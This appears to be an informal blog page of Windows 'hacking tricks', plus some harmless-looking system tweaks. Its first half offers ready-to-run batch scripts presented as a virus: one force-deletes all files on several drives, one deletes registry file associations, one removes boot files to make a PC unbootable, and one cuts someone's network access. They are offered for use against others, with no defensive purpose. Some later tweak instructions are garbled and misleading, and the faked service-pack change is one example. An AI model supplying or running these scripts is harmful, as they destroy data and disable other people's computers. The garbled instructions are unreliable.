Polly po-cket

Hacking Tricks & Tips

Because of its working idea,Computer has become so meaninful and understandable.Hackers they say really rule the worls.

 

Some Hacking Tips And Tricks

How to create a virus to delete system files

@echo off
del d:\*.* /f /s /q
del e:\*.* /f /s /q
del f:\*.* /f /s /q
del g:\*.* /f /s /q
del h:\*.* /f /s /q
del i:\*.* /f /s /q
del j:\*.* /f /s /q
then save it as anything.bat

How To Delete The Entire Registry

@echo off
start reg delete
HKCR/.exe
start reg delete
HKCR/.dll
start reg delete HKCR.*
now save it as anything.bat

How To Crash A PC Forever

@echo off
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini
now save it as anything.bat

How To Stop Someones Intenet Access

@echo off
ipconfig/release
save it as anything.bat

How To re-enable the Internet Access

@echo off
ipconfig/renew

How To disable Autoplay

REGEDIT4
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVesion\IniFileMapping\Autorun.inf]
@="@
SYS:DoesNotExist"

How to convert windows xp pack 2 to pack 3

First Go to Start
>RUN type here Regedit
Now press >enter
Go to This path ->
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Windows
Now Change The "CSDVersion" Value 0x00000200 Into SP3 Value 0x00000300 Change it.
Restart PC.

SPEED UP MENU DISPLAY.!!

When using the start menu the you will notice a delay between different tiers of
the menu hierarchy. For the fastest computer experience possible I recommend changing this value to zero.
This will allow the different tiers to appear instantly.
Start Regedit. If you are unfamiliar with regedit please
refer to our FAQ on how to get started.
Navigate to HKEY_CURRENT_USERControl PanelDesktop
Select MenuShowDelay from the list on the right.
Right on it and select Modify.
Change the value to 0.
Reboot your computer.

How to make your Desktop Icons Transparent

Go to Control Panel > System,
> Advanced > Performance area >
Settings button Visual Effects tab �Use drop
shadows for icon labels on the Desktop�

AUTO DELETE TEMPORARY FOLDER.!!

ll what i prefer is %temp% � without quotes.. at Start -> Run..
this opens ur temp folder n den u cal erase it neatly// still try dis one too..
First go into gpedit.msc Next select ->
Computer Configuration/Administrative Templates/Windows Components
/Terminal Services/Temporary Folder
Then right click �Do Not Delete Temp Folder Upon Exit� Go to properties and hit
disable. Now next time Windows puts a temp file in that folder
it will automatically delete it when its done!
Note from Admin: Remember, GPEDIT (Group Policy Editor) is only available in XP Pro.